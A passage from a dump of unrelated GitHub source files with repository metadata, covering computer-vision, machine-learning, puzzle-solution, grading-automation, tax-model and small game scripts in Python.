(3, 3))\n # print(A.dot(vh.T))\n self.pMatrix(homographyMat, desiredCoordinates, cornerList, img1)\n \n def pMatrix(self, homographyMat, cornerList, c, img1):\n K = np.array([[1346.100595, 0, 932.1633975],\n [0, 1355.933136, 654.8986796],\n [0, 0, 1]])\n # print(homographyMat)\n homographyMat = inv(homographyMat)\n # print(homographyMat[:, 0])\n lambda_ = 1/((np.linalg.norm(np.matmul(inv(K), homographyMat[:, 0])) + np.linalg.norm(np.matmul(inv(K),homographyMat[:, 1]))/2))\n B_dash = (inv(K).dot(homographyMat))\n \n # print(lambda_)\n if np.linalg.det(B_dash) < 0:\n B_dash = -B_dash\n B = lambda_*B_dash\n r1 = B[:,0]\n r2 = B[:,1]\n r3 = np.cross(r1, r2)\n t = B[:,2]\n R = np.array([r1, r2, r3, t]).T\n P = K.dot(R)\n P1 = P.dot(np.array([[cornerList[0][0]], [cornerList[0][1]], [-200], [1]]))\n P2 = P.dot(np.array([[cornerList[1][0]], [cornerList[1][1]], [-200], [1]]))\n P3 = P.dot(np.array([[cornerList[2][0]], [cornerList[2][1]], [-200], [1]]))\n P4 = P.dot(np.array([[cornerList[3][0]], [cornerList[3][1]], [-200], [1]]))\n \n P1_x = P1[0]/P1[2]\n P1_y = P1[1]/P1[2]\n\n P2_x = P2[0]/P2[2]\n P2_y = P2[1]/P2[2]\n \n P3_x = P3[0]/P3[2]\n P3_y = P3[1]/P3[2]\n \n P4_x = P4[0]/P4[2]\n P4_y = P4[1]/P4[2]\n \n color = (0, 255, 0)\n \n # Line thickness of 9 px\n thickness = 9\n img1 = cv2.line(img1, (P1_x, P1_y), (P2_x, P2_y), color, thickness)\n img1 = cv2.line(img1, (P1_x, P1_y), (P3_x, P3_y), color, thickness)\n img1 = cv2.line(img1, (P3_x, P3_y), (P4_x, P4_y), color, thickness)\n img1 = cv2.line(img1, (P2_x, P2_y), (P4_x, P4_y), color, thickness)\n\n img1 = cv2.line(img1, (P1_x, P1_y), c[0], color, thickness)\n img1 = cv2.line(img1, (P2_x, P2_y), c[1], color, thickness)\n img1 = cv2.line(img1, (P3_x, P3_y), c[2], color, thickness)\n img1 = cv2.line(img1, (P4_x, P4_y), c[3], color, thickness)\n \n img1 = cv2.line(img1, c[1], c[0], color, thickness)\n img1 = cv2.line(img1, c[3], c[1], color, thickness)\n img1 = cv2.line(img1, c[3], c[2], color, thickness)\n img1 = cv2.line(img1, c[0], c[2], color, thickness)\n #self.result.write(img1)\n \n cv2.imshow(\"frame\", img1)\n if cv2.waitKey(1) & 0xff == ord('q'):\n cv2.destroyAllWindows()\n\n def cornerDetector(self):\n cap = cv2.VideoCapture('1tagvideo.mp4')\n \n # Check if camera opened successfully\n if (cap.isOpened()== False): \n print(\"Error opening video file\")\n \n # Read until video is completed\n while(cap.isOpened()):\n ret, img = cap.read()\n if ret == True:\n #img = cv2.imread('frame2.jpg')\n img1 = img\n gray = cv2.cvtColor(img.copy(), cv2.COLOR_BGR2GRAY)\n gray = cv2.bilateralFilter(gray, 15, 75, 75)\n ret,img = cv2.threshold(gray,150,255,cv2.THRESH_BINARY)\n img = cv2.medianBlur(img,5)\n kernel = np.ones((5,5), np.uint8)\n img = cv2.dilate(img, kernel, iterations=2)\n gray = np.float32(gray)\n \n h, w = img.shape[:2]\n mask = np.zeros((h+2, w+2), np.uint8)\n cv2.floodFill(img, mask, (0,0), 255)\n \n corners = cv2.goodFeaturesToTrack(img,25,0.01,10)\n corners = np.int0(corners)\n \n ext0 = tuple(corners[corners[:, :, 1].argmin()][0])\n ext1 = tuple(corners[corners[:, :, 1].argmax()][0])\n ext2 = tuple(corners[corners[:, :, 0].argmin()][0])\n ext3 = tuple(corners[corners[:, :, 0].argmax()][0])\n\n y_min = tuple(corners[corners[:, :, 1].argmin()][0])[1]\n y_max = tuple(corners[corners[:, :, 1].argmax()][0])[1]\n x_min = tuple(corners[corners[:, :, 0].argmin()][0])[0]\n x_max = tuple(corners[corners[:, :, 0].argmax()][0])[0]\n\n color = (0, 255, 0)\n img1 = cv2.circle(img1, ext0, 5, color, -1)\n img1 = cv2.circle(img1, ext1, 5, color, -1)\n 
img1 = cv2.circle(img1, ext2, 5, color, -1)\n img1 = cv2.circle(img1, ext3, 5, color, -1)\n \n cornerList = [ext0, ext3, ext2, ext1]\n if 100 < x_max - x_min < 200 and 100 < y_max - y_min < 200: \n continue \n desiredCoordinates = [(x_min, y_min), (x_max, y_min), (x_min, y_max), (x_max, y_max)]\n self.gethomographyMat(cornerList, desiredCoordinates, img1)\n\n \np = AR_Detect()\np.cornerDetector()","repo_name":"ameyakonk/Image-and-3D-cube-superimposition-on-AR-tag","sub_path":"src/Cube_code_detection.py","file_name":"Cube_code_detection.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71528967452","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@created: 31.10.20\n@author: felix\n\"\"\"\nfrom collections import Counter\n\n\nif __name__ == '__main__':\n group_size = int(input().rstrip())\n k = input().rstrip().split()\n c_dict = Counter(k)\n print(sorted(c_dict.items(), key=lambda x: x[1])[0][0])\n","repo_name":"FelixTheC/hackerrank_exercises","sub_path":"hackerrank/hkr_captains_room.py","file_name":"hkr_captains_room.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72313203610","text":"import csv\nimport os\n\nimport pygsheets\nfrom git import Repo\nimport git\n\nclass Grader:\n\n def csv_converter(self, input_path, output_path):\n \"\"\"\n Converts a comma delimited csv file to a tab delimited csv file.\n :param input_path:\n :param output_path:\n \"\"\"\n print(\"Converting CSV to tab-delimited file...\")\n print('Path: ' + input_path)\n with open(input_path) as inputFile:\n with open(output_path, 'w+', newline='', encoding='utf-16') as outputFile:\n reader = csv.reader(inputFile)\n for row in reader:\n outputFile.write('\\t'.join(row)+'\\n')\n\n #reader = csv.DictReader(inputFile, delimiter=',')\n #writer = csv.DictWriter(outputFile, reader.fieldnames, delimiter='\\t', dialect='excel-tab')\n #writer.writeheader()\n #writer.writerows(reader)\n\n #csvwriter = csv.writer(reader.fieldnames, dialect='excel-tab')\n #csv_writerows(csvwriter, reader, encoding='utf-16')\n os.remove(input_path)\n print(\"Conversion complete.\")\n\n\n def grade_students(self, spreadsheet_url=None):\n\n DONT_GRADE = ['ASD009','haa037', 'tny009']\n DO_GRADE = ['ekj008']\n GRADED_STUDENTS_FILE = \"GRADED_STUDENTS.txt\"\n #SPREADSHEET_URL = spreadsheet_url\n\n if not spreadsheet_url:\n SPREADSHEET_URL = str(input(\"Paste the link to your Google Sheets gradings: \"))\n else:\n SPREADSHEET_URL = spreadsheet_url\n\n if not SPREADSHEET_URL:\n print(\"No URL given, closing down...\")\n return\n\n # Authorize pygsheets\n client = pygsheets.authorize()\n print(\"Authorized!\")\n\n # Get grading sheet\n try:\n grading_spreadsheet = client.open_by_url(SPREADSHEET_URL)\n print(\"Got the spreadsheet!\")\n except pygsheets.exceptions.NoValidUrlKeyFound:\n print(\"Couldn't find a valid spreadsheet, stopping script...\")\n return\n\n # Create graded students file.\n with open(GRADED_STUDENTS_FILE, 'w') as name_file:\n name_file.write(\"GRADED STUDENTS: \\n\")\n name_file.close()\n\n grading_sheets = grading_spreadsheet.worksheets()\n\n # Go through each individual sheet.\n for sheet in grading_sheets:\n student_id = sheet.get_value('D2')\n\n\n # Skip the DONT_GRADE students.\n if student_id not in DO_GRADE:\n continue\n\n if student_id in DONT_GRADE:\n continue\n\n print('Student ID: ' + student_id)\n\n\n # 
1. Clone the student repo.\n\n curr_repo_path = 'student_repos/'+student_id\n student_repo = Repo.init(curr_repo_path)\n try:\n origin = student_repo.create_remote('origin', 'https://retting.ii.uib.no/' + student_id + '/inf101.v19.sem2')\n #origin = student_repo.create_remote('origin', 'https://retting.ii.uib.no/'+ student_id +'/python-pushing-est') # Testing purposes\n\n except git.exc.GitCommandError:\n print(\"You have already cloned this repo in here!\")\n origin = student_repo.remote('origin')\n\n # TESTS AND SHIT\n assert origin.exists()\n assert origin == student_repo.remotes.origin == student_repo.remotes['origin']\n try:\n origin.fetch()\n except git.exc.GitCommandError:\n if student_id:\n print(\"Didn't find any student ID.\")\n else:\n print(\"{} is not a valid student ID.\".format(student_id))\n\n print(\"Going to next sheet...\")\n continue\n\n student_repo.create_head('master', origin.refs.master) # create local branch \"master\" from remote \"master\"\n student_repo.heads.master.set_tracking_branch(origin.refs.master) # set local \"master\" to track remote \"master\n student_repo.heads.master.checkout() # checkout local \"master\" to working tree\n\n # lazy renaming\n repo = student_repo\n\n # 2. MAKE THE GRADING BRANCH\n try:\n repo.git.checkout('grading')\n print(\"Used previous branch.\")\n\n except git.exc.GitCommandError:\n repo.git.branch('grading')\n repo.git.checkout('grading')\n print(\"Made new branch.\")\n\n\n # 3. Save the student's sheet.\n commas_sheet_name = student_id + '_commas'\n finished_sheet_name = student_id\n sheet.export(file_format = pygsheets.ExportType.CSV, filename=commas_sheet_name, path=curr_repo_path+'/')\n\n # Converts the csv.\n input_path = curr_repo_path+'/' + commas_sheet_name + '.csv'\n output_path = curr_repo_path+'/' + finished_sheet_name +'.csv'\n self.csv_converter(input_path=input_path, output_path=output_path)\n\n\n\n # 4. COMMIT AND PUSH\n repo.git.add('--all')\n repo.index.commit(\"FINAL GRADING\")\n repo.git.push(\"origin\", \"HEAD\")\n print(\"Pushed to repo!\")\n\n\n # 5. 
Save the IDs of the student's that have received grading.\n with open(GRADED_STUDENTS_FILE, 'a') as name_file:\n name_file.write(student_id + '\\n')\n name_file.close()\n","repo_name":"Zylvian/py_googlesheets_grading","sub_path":"py_googlesheets_grading/google_sheets_grading_script.py","file_name":"google_sheets_grading_script.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16054041827","text":"#!/usr/bin/env python3\nimport sys\n\nsum_ = 0\n\nfor line in sys.stdin:\n for output in line.split(\" | \")[1].split():\n sum_ += len(output) in (2, 3, 4, 7)\n\nprint(sum_)\n","repo_name":"pauldraper/advent-of-code-2021","sub_path":"problems/day-08/part_1.py","file_name":"part_1.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26464427907","text":"from enum import Enum, auto\nfrom math import atan2, cos, sin\nfrom textwrap import dedent\n\nfrom maths import Coord\nfrom ship import AX00SpaceFreighter\nfrom world import Planet\n\n\nclass State(Enum):\n GROUNDED = auto()\n TRAVELING = auto()\n ARRIVED = auto()\n\n\nclass Player(Coord):\n def __init__(self, name=\"Anon\"):\n self.location = None\n self.name = name\n self.age = 21\n\n self.state = State.GROUNDED\n\n self.credits = 20000\n\n self.inventory = []\n self.spaceShip = AX00SpaceFreighter()\n\n self.destination = None\n self.startPos = None\n self.targetMessage = None\n\n def startTravel(self, dest: Planet, target_message):\n if self.spaceShip is None:\n return\n self.x, self.y = self.location.x, self.location.y\n self.startPos = Coord(self.x, self.y)\n self.destination = dest\n self.state = State.TRAVELING\n self.targetMessage = target_message\n print(self.targetMessage)\n\n async def updateTargetMessage(self):\n if self.state is not State.TRAVELING:\n return\n if self.targetMessage is not None:\n try:\n perc = int(self.travelPercent / 2)\n fill = int(50 - perc)\n string = (\"=\" * perc) + (\"-\" * fill)\n await self.targetMessage.edit(content=f\"`traveling to '{self.destination.name}' [{string}]`\")\n except Exception as e:\n print(e)\n self.targetMessage = None\n pass\n\n def tick(self):\n self.age += 0.1\n\n if self.state is State.TRAVELING:\n angle = atan2(self.destination.y - self.y, self.destination.x - self.x)\n self.x += cos(angle) * self.spaceShip.baseSpeed\n self.y += sin(angle) * self.spaceShip.baseSpeed\n\n if self.dist(self.destination) < 1.0:\n self.x = self.destination.x\n self.y = self.destination.y\n self.location = self.destination\n self.state = State.GROUNDED\n\n def locate(self, universe):\n planet, system, galaxy = universe.getPlanetByName(self.location.name)\n localeStr = f\"You are on the planet {planet.name}\"\n if self.state is State.TRAVELING:\n localeStr = f\"You are traveling to {self.destination.name} from {self.location.name}\"\n localeStr += f\" ({self.travelPercent}%)\"\n return dedent(f\"\"\"\n {planet.toStr()}\\n\n {localeStr} in\n the '{system.name}' system within the '{galaxy.name}' galaxy\n \"\"\").replace('\\n', ' ')\n\n def locateLocal(self):\n localeStr = f\"You are on the planet {self.location.name}\"\n if self.state is State.TRAVELING:\n localeStr = f\"You are traveling to {self.destination.name} from {self.location.name}\"\n localeStr += f\" ({self.travelPercent}%)\"\n return localeStr\n\n @property\n def travelPercent(self):\n startDist = self.startPos.dist(self.destination)\n dist = 
self.dist(self.destination)\n return 100 - int(100.0 * float(dist / startDist))\n\n def __str__(self):\n lns = [\n f\"name: {self.name}\",\n f\"age: {self.age}\",\n f\"location: {self.location.name}\"\n ]\n\n if self.state is State.TRAVELING:\n lns.append(f\"Traveling to {self.destination.name} ({self.travelPercent}%)\")\n\n num = 0\n for ln in lns:\n if len(ln) > num:\n num = len(ln)\n\n res = \"+\" + \"-\" * num + \"+\\n\"\n for ln in lns:\n res += \"|\" + ln + \" \" * (num - len(ln)) + \"|\\n\"\n res += \"+\" + \"-\" * num + \"+\\n\"\n return res\n\n","repo_name":"SkyVault/GravyRPG","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31387222057","text":"import gym\n\nfrom utils import *\n\n\n\n\nif __name__ == \"__main__\":\n env = gym.make('Taxi-v3')\n\n conf = load_conf(\"conf.yaml\")\n AgentModule = AgentFactory.create_agent(\"Expected-SARSA\")\n agent = AgentModule(env.observation_space.n, env.action_space.n, conf)\n avg_rewards, best_avg_reward = train(env, agent, conf)\n interact(env, agent)\n\n #compare\n # compare(env, [\"Q-learning\", \"SARSA\", \"Expected-SARSA\"])\n #NOTE: available algorithms are: [\"Q-learning\", \"SARSA\", \"Expected-SARSA\"]","repo_name":"Anwarvic/taxi-v3-RL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"71372007132","text":"from sys import stdin,stdout\n\nt = int(stdin.readline().strip())\n\nfor _ in range(t):\n c = list(map(int, stdin.readline().split()))\n c.sort(reverse=True)\n total = c[1]-c[2]\n c[0],c[1] = c[0]-total,c[1]-total\n k = min(c[0]-c[1],c[1])\n total += k*2\n c[1] = c[1] - k\n total += 3*(c[1]//2) + c[1]%2\n stdout.write(\"{}\\n\".format(total))\n","repo_name":"xiema/competitive","sub_path":"codeforces/old/sweetprob.py","file_name":"sweetprob.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30076043247","text":"\"\"\"\r\n\n\nWrite a function that takes a string and calculates the number of letters and\ndigits within it. 
Return the result in a dictionary.\n\n### Examples\n\n    count_all(\"Hello World\") ➞ { \"LETTERS\": 10, \"DIGITS\": 0 }\n    \n    count_all(\"H3ll0 Wor1d\") ➞ { \"LETTERS\": 7, \"DIGITS\": 3 }\n    \n    count_all(\"149990\") ➞ { \"LETTERS\": 0, \"DIGITS\": 6 }\n\n### Notes\n\n  * Tests contain only alphanumeric characters.\n  * Spaces are not letters.\n  * All tests contain valid strings.\n\n\"\"\"\r\n\nimport string\ndef count_all(txt):\n    lettcount = 0\n    digicount = 0\n    \n    for i in txt:\n        if i in string.ascii_lowercase or i in string.ascii_uppercase:\n            lettcount += 1\n        elif i in \"0123456789\":\n            digicount += 1\n    \n    \n    return {'LETTERS':lettcount,'DIGITS':digicount}\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"KEz3TAQfh9WxSZMLH_9.py","file_name":"KEz3TAQfh9WxSZMLH_9.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18555314035","text":"\"\"\"Schemas for returning a list of books.\"\"\"\nimport datetime\n\nfrom pydantic.v1 import BaseModel\n\nfrom domain.book.values import BookAuthor, BookGenre, BookName\nfrom entrypoints.web.schema.book.short import BookShortSchema\nfrom entrypoints.web.schema.list_params import ListSchema\nfrom infrastructure.repository.base.list import SQLFilter\n\n\nclass ListBookQueryParams(ListSchema):\n    \"\"\"Query parameters for refining a request for a list of Books.\n\n    None is fine here because all book fields are always filled in. Strictly speaking, something like NotSet should be used instead.\n    \"\"\"\n\n    # Filters:\n    name: BookName | None = None\n    author: BookAuthor | None = None\n    genre: BookGenre | None = None\n    date_published: datetime.date | None = None\n    downloadable: bool | None = None\n\n    def to_sql_filters(self) -> list[SQLFilter] | None:\n        \"\"\"Convert to sql filters.\"\"\"\n        filters = []\n        if self.name is not None:\n            filters.append(SQLFilter(\"name\", self.name))\n        if self.author is not None:\n            filters.append(SQLFilter(\"author\", self.author))\n        if self.genre is not None:\n            filters.append(SQLFilter(\"genre\", self.genre))\n        if self.date_published is not None:\n            filters.append(SQLFilter(\"date_published\", self.date_published))\n        if self.downloadable is not None:\n            filters.append(SQLFilter(\"downloadable\", self.downloadable))\n        return filters or None\n\n\nclass ListBookOutputSchema(BaseModel):\n    \"\"\"Schema for returning a list of books.\"\"\"\n\n    books: list[BookShortSchema]\n","repo_name":"Gerleff/ddd-book-manager","sub_path":"src/entrypoints/web/schema/book/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42187897547","text":"\"\"\"\ntrain a pytorch image classification model using device-agnostic code.\n\"\"\"\nimport os\nimport torch\nfrom torchvision import transforms\nimport data_setup, engine, model, utils \nfrom timeit import default_timer as timer \n\n# Set random seeds\ntorch.manual_seed(42) \ntorch.cuda.manual_seed(42)\n\n# Set number of epochs\nNUM_EPOCHS = 5\nBATCH_SIZE = 32\nHIDDEN_UNITS = 10\nLEARNING_RATE = 0.001\n\ntrain_dir = \"data/pizza_steak_sushi/train\"\ntest_dir = \"data/pizza_steak_sushi/test\"\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n# Create transforms\ndata_transform = transforms.Compose([\n  transforms.Resize((64,64)),\n  transforms.ToTensor()\n])\n\n# get dataloaders and class names\ntrain_dataloader, test_dataloader, class_names = data_setup.create_dataloaders(\n    train_dir = train_dir,\n    test_dir 
= test_dir,\n transform= data_transform,\n batch_size = BATCH_SIZE\n)\n\n# Recreate an instance of TinyVGG\nmodel = model.TinyVGG(input_shape=3, # number of color channels (3 for RGB) \n hidden_units=HIDDEN_UNITS, \n output_shape=len(class_names)).to(device)\n\n# Setup loss function and optimizer\nloss_fn = torch.nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(params=model.parameters(), lr=LEARNING_RATE)\n\n# Start the timer\nstart_time = timer()\n\n# Train model_0 \nmodel_results = engine.train(model=model, \n train_dataloader=train_dataloader,\n test_dataloader=test_dataloader,\n optimizer=optimizer,\n loss_fn=loss_fn, \n epochs=NUM_EPOCHS,\n device=device)\n\n# End the timer and print out how long it took\nend_time = timer()\nprint(f\"[INFO] Total training time: {end_time-start_time:.3f} seconds\")\n\n# Save the model\nutils.save_model(model=model,\n target_dir=\"models\",\n model_name=\"05_going_modular_script_mode_tinyvgg_model.pth\")\n","repo_name":"jamesshoemake/pytorch_models","sub_path":"going_modular/going_modular/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29993753457","text":"\ndef spiral_order(lst):\n result = []\n if len(lst) == 0:\n return []\n elif len(lst) == 1 and len(lst[0]) == 1:\n return [lst[0][0]]\n elif len(lst) == 1 and len(lst[0]) > 1:\n for j in range(len(lst[0])):\n result.append(lst[0][j])\n return result\n else:\n for j in range(len(lst[0])):\n result.append(lst[0][j])\n for i in range(1, len(lst) - 1):\n result.append(lst[i][-1])\n for j in range(len(lst[0]) - 1, -1, -1):\n result.append(lst[-1][j])\n for i in range(len(lst) - 2, 0, -1):\n result.append(lst[i][0])\n lst_remain = []\n for i in range(1, len(lst) - 1):\n lst_remain.append([lst[i][j] for j in range(1, len(lst[0]) - 1)])\n return result + spiral_order(lst_remain)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"jT7PY2yTWTuxcqpJe_16.py","file_name":"jT7PY2yTWTuxcqpJe_16.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41367207958","text":"from fiscalsim_us.model_api import *\n\n\nclass va_refundable_credits(Variable):\n value_type = float\n entity = TaxUnit\n label = \"line 26 on the va tax return\"\n unit = USD\n definition_period = YEAR\n defined_for = StateCode.VA\n\n def formula(tax_unit, period, parameters):\n line_19 = tax_unit(\"va_witholding\", period)\n\n line_19b = tax_unit(\"va_spouse_witholding\", period)\n\n line_20 = tax_unit(\"va_estimated_tax_payments_for_tax_year\", period)\n\n line_21 = tax_unit(\n \"va_amount_of_prior_year_overpayment_applied_to_current_year\",\n period,\n )\n\n line_22 = tax_unit(\"va_extension_payments\", period)\n\n line_23 = tax_unit(\"va_tax_credit_for_low_income_individuals\", period)\n\n line_24 = tax_unit(\"va_credits_from_enclosed_schedule_cr\", period)\n\n return (\n line_19\n + line_19b\n + line_20\n + line_21\n + line_22\n + line_24\n + line_23\n )\n","repo_name":"TheCGO/fiscalsim-us","sub_path":"fiscalsim_us/variables/gov/states/va/tax/income/va_refundable_credits.py","file_name":"va_refundable_credits.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"34980131319","text":"import torch\nfrom torch.nn import Linear, Module, MSELoss\nfrom torch.optim import SGD, RMSprop, Adam\nimport numpy 
as np\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# define linear function\n# x = np.linspace(0, 20, 500)\n# y = 5 * x +7\n# plt.plot(x, y)\n# plt.savefig('linear_function.pdf')\n# plt.show()\n\nx = np.random.rand(256)\nnoise = np.random.rand(256) / 4\ny = x * 5 + 7 + noise\n\n# df = pd.DataFrame()\n# df['x'] = x\n# df['y'] = y\n# sns.lmplot(x='x', y='y', data=df)\n# plt.savefig('linear_function_noise.pdf')\n# plt.show()\n\nmodel = Linear(1, 1)\ncriterion = MSELoss()\n# optim = SGD(model.parameters(), lr=0.01)\n# optim = RMSprop(model.parameters(), lr=0.01 ,alpha = 0.99)\noptim = Adam(model.parameters(), lr=0.001, betas = (0.9, 0.999), eps = 1e-08)\n\nepochs = 15001\n\nx_train = x.reshape(-1, 1).astype('float32')\ny_train = y.reshape(-1, 1).astype('float32')\n\nfor i in range(epochs):\n\n\tinputs = torch.from_numpy(x_train)\n\tlables = torch.from_numpy(y_train)\n\n\toutputs = model(inputs)\n\n\toptim.zero_grad()\n\n\tloss = criterion(outputs, lables)\n\n\tloss.backward()\n\n\toptim.step()\n\tif i % 100 == 0:\n\t\tprint('epoch: {}, loss: {:1.4f}.'.format(i, loss.data.item()))\n\ntorch.save(model, 'linear_regression_pytorch.pkl')\n# [w, b] = model.parameters()\n# print(w.item(), b.item())\n\npredicted = model.forward(torch.from_numpy(x_train)).data.numpy()\nplt.scatter(x_train, y_train, c = 'blue', label = 'data', alpha =0.35)\nplt.plot(x_train, predicted, c = 'red', label = 'predicted', alpha = 1)\nplt.legend(loc = 'best', frameon = True)\nplt.savefig('linear_regression_pytorch.pdf')\nplt.show()\n","repo_name":"ceadmond/GRUNK-Pytorch-Tutorial","sub_path":"Chapter 2/dl_basic.py","file_name":"dl_basic.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71396029210","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\n\ntorch.manual_seed(17) # eliminate random.\n\nbatch_size = 100\n\n# MNIST dataset\ntrain_dataset = torchvision.datasets.MNIST(root='../../data', \n train=True, \n transform=transforms.ToTensor(),\n download=True)\n\ntest_dataset = torchvision.datasets.MNIST(root='../../data', \n train=False, \n transform=transforms.ToTensor())\n\n# Data loader\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, \n batch_size=batch_size, \n shuffle=True)\n\ntest_loader = torch.utils.data.DataLoader(dataset=test_dataset, \n batch_size=batch_size, \n shuffle=False)\n\n# Model\nclass Model(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.linear = torch.nn.Linear(784, 10)\n\n def forward(self, x):\n return self.linear(x)\n\n# initialize\nmodel = Model()\n\nfor images, labels in train_loader:\n print(images.shape) # torch.Size([100, 1, 28, 28])\n images = images.view(-1, 784)\n print(images.shape) # torch.Size([100, 784])\n\n # forward\n predict = model(images)\n print(predict.shape)\n exit()\n \n'''\ntorch.Size([100, 1, 28, 28])\ntorch.Size([100, 784])\ntorch.Size([100, 10])\n'''","repo_name":"adldotori/how-to-make-face-answer","sub_path":"number_classification/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7169606665","text":"import pycountry\n\nfrom world_locations.models import Country, Subdivision, SubdivisionType\n\ndef create_subdivision(subdivision, country):\n \"\"\"\n Recursively create Django Subdivision objects\n \n 
Note:\n subdivision is a pycountry object\n country is a Django object\n \"\"\"\n t, created = SubdivisionType.objects.get_or_create(name=subdivision.type)\n sd, created = Subdivision.objects.get_or_create(code=subdivision.code,\n country=country,\n name=subdivision.name,\n subdivision_type=t)\n if subdivision.parent_code:\n parent = subdivision.parent\n p = create_subdivision(parent, country)\n sd.parent = p\n sd.save()\n\n return sd\n \n\nfor country in pycountry.countries.objects:\n c, created = Country.objects.get_or_create(alpha2=country.alpha2,\n alpha3=country.alpha3,\n name=country.name,\n numeric=country.numeric,\n published=True)\n try:\n c.official_name=country.official_name\n c.save()\n except AttributeError:\n pass\n\n try:\n subdivisions = pycountry.subdivisions.get(country_code=c.alpha2)\n except KeyError:\n subdivisions = []\n for subdivision in subdivisions:\n create_subdivision(subdivision, c)\n \n","repo_name":"lincolnloop/django-locations","sub_path":"world_locations/utils/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"19038836150","text":"articles_dict = [\n {\n \"title\": \"Endless ocean waters.\",\n \"author\": \"Jhon Stark\",\n \"year\": 2019,\n },\n {\n \"title\": \"Oceans of other planets are full of silver\",\n \"author\": \"Artur Clark\",\n \"year\": 2020,\n },\n {\n \"title\": \"An ocean That cannot be crossed.\",\n \"author\": \"Silver Name\",\n \"year\": 2021,\n },\n {\n \"title\": \"The ocean that you love.\",\n \"author\": \"Golden Gun\",\n \"year\": 2021,\n },\n]\n\n\ndef find_articles(key, letter_case=False):\n result = list()\n if letter_case:\n for i in range(len(articles_dict)):\n if articles_dict[i][\"title\"].find(key) != -1 or articles_dict[i][\"author\"].find(key) != -1:\n result.append(articles_dict[i])\n else:\n for i in range(len(articles_dict)):\n if (articles_dict[i][\"title\"].lower()).find(key) != -1 or (articles_dict[i][\"author\"].lower()).find(key) != -1:\n result.append(articles_dict[i])\n return result\nprint(find_articles(\"tha\"))","repo_name":"yehor393/GOIT","sub_path":"P5E2.py","file_name":"P5E2.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21632084924","text":"# Idiom 1: Use tuples to unpack data\n\nfoods = ['Banana', 'Apple', 'Coffee']\n\n(one, two, three) = foods\n\nprint('{0}, {1}, {2}'.format(one, two, three))\n\n# Idiom 2: Use _ as a placeholder for data in a tuple that should be ignored\n\n(one, two, _) = ['Banana', 'Apple', 'Coffee']\n\nprint('{0}, {1}'.format(one, two))\n\n# Idiom 3: Avoid using a temporary variable in Python. 
We can use tuples to make our intention more clear.\n\nfoo = 'Foo'\nbar = 'Bar'\n\n(foo, bar) = (bar, foo)\n\nassert(foo == 'Bar')\nassert(bar == 'Foo')","repo_name":"csheare/python_tricks","sub_path":"blankbale/section2/tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"21694987879","text":"# coding=utf-8\nimport json\nimport os\n\nfrom vp_manager.config import const\nfrom vp_manager.config.account import project_path\n\nmission_path = os.path.join(project_path, const.MISSION_DATA_PATH)\nfollower_path = os.path.join(project_path, const.FOLLOWER_DATA_PATH)\n\nwith open(mission_path, 'r', encoding='utf-8') as f:\n    mission_list = json.loads(f.read())\n\nwith open(follower_path, 'r', encoding='utf-8') as f:\n    follower_list = json.loads(f.read())\n\nreward_list = {\n    '187569': const.MRT_BOX_CLOTH,  # Broker's tailoring boost mote\n    '187572': const.MRT_BOX_GRASS,  # Broker's herbalism boost mote\n    '187573': const.MRT_BOX_MAGIC,  # Broker's enchanting boost mote\n    '187574': const.MRT_BOX_FISH,  # Broker's overflowing bucket\n    '187413': const.MRT_EXP_ITEM,  # 3000 exp\n    '187414': const.MRT_EXP_ITEM,  # 7500 exp\n    '184646': const.MRT_BOX_MINE,  # Heroic mining crate\n    '184647': 